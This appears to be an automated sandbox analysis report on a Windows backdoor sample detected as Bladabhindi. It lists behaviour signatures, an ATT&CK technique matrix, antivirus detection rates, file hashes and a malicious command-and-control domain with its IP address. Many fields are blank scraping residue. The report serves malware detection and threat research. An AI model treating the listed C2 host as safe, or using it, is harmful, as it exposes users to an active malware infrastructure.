Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | |||
Source: | Window / User API: |
Source: | Evasive API call chain: | graph_0-83066 | ||
Source: | Evasive API call chain: |
Source: | API coverage: | ||
Source: | API coverage: | ||
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | |||
Source: | Thread sleep time: |
Source: | Code function: | 0_2_004339B6 | |
Source: | Code function: | 0_2_0044BD27 | |
Source: | Code function: | 0_2_0044BF8B | |
Source: | Code function: | 0_2_00452492 | |
Source: | Code function: | 0_2_00442886 | |
Source: | Code function: | 0_2_004788BD | |
Source: | Code function: | 0_2_0045CAFA | |
Source: | Code function: | 0_2_00431A86 | |
Source: | Code function: | 0_2_0045DE8F | |
Source: | Code function: | 1_2_00B2449B | |
Source: | Code function: | 1_2_00B2C7E8 | |
Source: | Code function: | 1_2_00B2C75D | |
Source: | Code function: | 1_2_00B2F021 | |
Source: | Code function: | 1_2_00B2F17E | |
Source: | Code function: | 1_2_00B2F47F | |
Source: | Code function: | 1_2_00B23833 | |
Source: | Code function: | 1_2_00B23B56 | |
Source: | Code function: | 1_2_00B2BD48 | |
Source: | Code function: | 12_2_0040449B | |
Source: | Code function: | 12_2_0040C75D | |
Source: | Code function: | 12_2_0040C7E8 | |
Source: | Code function: | 12_2_0040F021 | |
Source: | Code function: | 12_2_0040F17E | |
Source: | Code function: | 12_2_0040F47F | |
Source: | Code function: | 12_2_00403833 | |
Source: | Code function: | 12_2_00403B56 | |
Source: | Code function: | 12_2_0040BD48 |
Source: | Code function: | 0_2_0040E500 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | API call chain: | graph_0-82189 |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_0045A370 |
Source: | Code function: | 0_2_0040D590 |
Source: | Code function: | 1_2_00AF5BFC |
Source: | Code function: | 0_2_0040EBD0 |
Source: | Code function: | 0_2_004238DA |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: |
Source: | Code function: | 0_2_0041F250 | |
Source: | Code function: | 0_2_0041A208 | |
Source: | Code function: | 0_2_00417DAA | |
Source: | Code function: | 1_2_00AEA2A4 | |
Source: | Code function: | 1_2_00AEA2D5 | |
Source: | Code function: | 12_2_003CA2A4 | |
Source: | Code function: | 12_2_003CA2D5 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Source: | Code function: | 0_2_00436CD7 |
Source: | Code function: | 0_2_0040D590 |
Source: | Code function: | 0_2_00434418 |
Source: | Code function: | 0_2_0043333C |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | ||
Source: | Process created: |
Source: | Code function: | 0_2_00446124 |
Source: | Code function: | 1_2_00B24A08 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 1_2_00AE87AB |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_004720DB |
Source: | Code function: | 0_2_00472C3F |
Source: | Code function: | 0_2_0041E364 |
Source: | Code function: | 0_2_0040E500 |
Lowering of HIPS / PFW / Operating System Security Settings |
---|
Source: | Registry value created: | Jump to behavior |
Source: | Process created: |
Source: | Process created: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: | 0_2_004652BE | |
Source: | Code function: | 0_2_00476619 | |
Source: | Code function: | 0_2_0046CEF3 | |
Source: | Code function: | 1_2_00B36399 | |
Source: | Code function: | 1_2_00B3685D | |
Source: | Code function: | 12_2_00416399 | |
Source: | Code function: | 12_2_0041685D |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 31 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | 1 Replication Through Removable Media | 11 Command and Scripting Interpreter | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | 221 Registry Run Keys / Startup Folder | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 Software Packing | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 DLL Side-Loading | LSA Secrets | 25 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 221 Registry Run Keys / Startup Folder | 11 Masquerading | Cached Domain Credentials | 13 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
81% | ReversingLabs | Win32.Backdoor.Bladabhindi | ||
69% | Virustotal | Browse | ||
100% | Avira | HEUR/AGEN.1321308 | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | HEUR/AGEN.1321308 | ||
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML | |||
81% | ReversingLabs | Win32.Backdoor.Bladabhindi | ||
67% | Virustotal | Browse | ||
81% | ReversingLabs | Win32.Backdoor.Bladabhindi | ||
69% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
9% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
water-boom.duckdns.org | 192.169.69.25 | true | true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.169.69.25 | water-boom.duckdns.org | United States | 23033 | WOWUS | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1465120 |
Start date and time: | 2024-07-01 10:20:39 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 9m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 14 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | ._cache_1.exe |
Detection: | MAL |
Classification: | mal100.phis.troj.evad.winEXE@14/16@28/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
01:21:46 | Autostart | |
04:21:26 | API Interceptor | |
04:21:38 | API Interceptor | |
04:21:42 | API Interceptor | |
04:21:57 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
192.169.69.25 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | ADWIND WSHRAT | Browse |
| ||
Get hash | malicious | ADWIND WSHRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | WSHRat | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
WOWUS | Get hash | malicious | Njrat | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla, SugarDump, XWorm | Browse |
| ||
Get hash | malicious | Nanocore | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6916 |
Entropy (8bit): | 4.765218321768022 |
Encrypted: | false |
SSDEEP: | 192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV |
MD5: | 665354A1A9139D1FA96E6FCC7F1FCE73 |
SHA1: | 8477F42550FBBA457D4015AAAC889272C7FAF1D8 |
SHA-256: | 146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01 |
SHA-512: | F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 915456 |
Entropy (8bit): | 6.744106843807966 |
Encrypted: | false |
SSDEEP: | 12288:pCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBga1T1W+MQ:pCdxte/80jYLT3U1jfsWahI+MQ |
MD5: | 4D3B21451ED0EE3EE65888D4C8944693 |
SHA1: | DCFEC58EC8D9D8EC45D0B033DB4462F1DAFE5AB3 |
SHA-256: | 25BC108A683D25A77EFCAC89B45F0478D9DDD281A9A2FB1F55FC6992A93AA830 |
SHA-512: | 5D70915816DC4FA3C83EE6CE5445CB6AEA0421601B38DA04679C1FFED5B980ACF05E8F6E6348FE7BE4907A85679B0A44FF9D95AB076D2E8368D78067860946EC |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 549694 |
Entropy (8bit): | 7.768792119579801 |
Encrypted: | false |
SSDEEP: | 12288:2jTK1zAd1HfdTexNnGnZAbwXVSsaoCeFoHiS7fYXk0Qps:2TK1zMHfIrWEw9a/b3gXkH2 |
MD5: | FBC5F5BB74C7CE2B59F38B8954EF694C |
SHA1: | 9F5C574C4EC6BE64F7AD25260BFE7593F166E0F4 |
SHA-256: | 3FBAF6860196EDE7B63F3CADABD95FD0A111F2214894C12A5FB0CBB6CE657615 |
SHA-512: | 096BC45CA63CEFF8A6F429CF0786869B87D5A856504C915CD4DE7F04DEA92229AA0010D3536C340F6AF3713FF52A9BA4CA4B8714D3C29B1780F64A509D011342 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\AppData\Local\Temp\x.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 549694 |
Entropy (8bit): | 7.768792119579801 |
Encrypted: | false |
SSDEEP: | 12288:2jTK1zAd1HfdTexNnGnZAbwXVSsaoCeFoHiS7fYXk0Qps:2TK1zMHfIrWEw9a/b3gXkH2 |
MD5: | FBC5F5BB74C7CE2B59F38B8954EF694C |
SHA1: | 9F5C574C4EC6BE64F7AD25260BFE7593F166E0F4 |
SHA-256: | 3FBAF6860196EDE7B63F3CADABD95FD0A111F2214894C12A5FB0CBB6CE657615 |
SHA-512: | 096BC45CA63CEFF8A6F429CF0786869B87D5A856504C915CD4DE7F04DEA92229AA0010D3536C340F6AF3713FF52A9BA4CA4B8714D3C29B1780F64A509D011342 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1178304 |
Entropy (8bit): | 7.456452138313528 |
Encrypted: | false |
SSDEEP: | 24576:HRmJkcoQricOIQxiZY1iagI+bpJBIAkPcJCqbVvi1N:sJZoQrbTFZY1iagTpVkybVqT |
MD5: | 62C01F1B2AC0A7BAB6C3B50FD51E6A36 |
SHA1: | CFC301A04B9A4FFEB0DC4578C1998A4EB4754F7B |
SHA-256: | C46A631F0BC82D8C2D46E9D8634CC50242987FA7749CAC097439298D1D0C1D6E |
SHA-512: | 6617B2723526A8F569D796352E21FB902D1DB76DD3A3C6B6562915A7FB087B7E65871921FCDC97871B302D77EFA0B60D63872BB0B8BAE4A7D982486428CD43AB |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
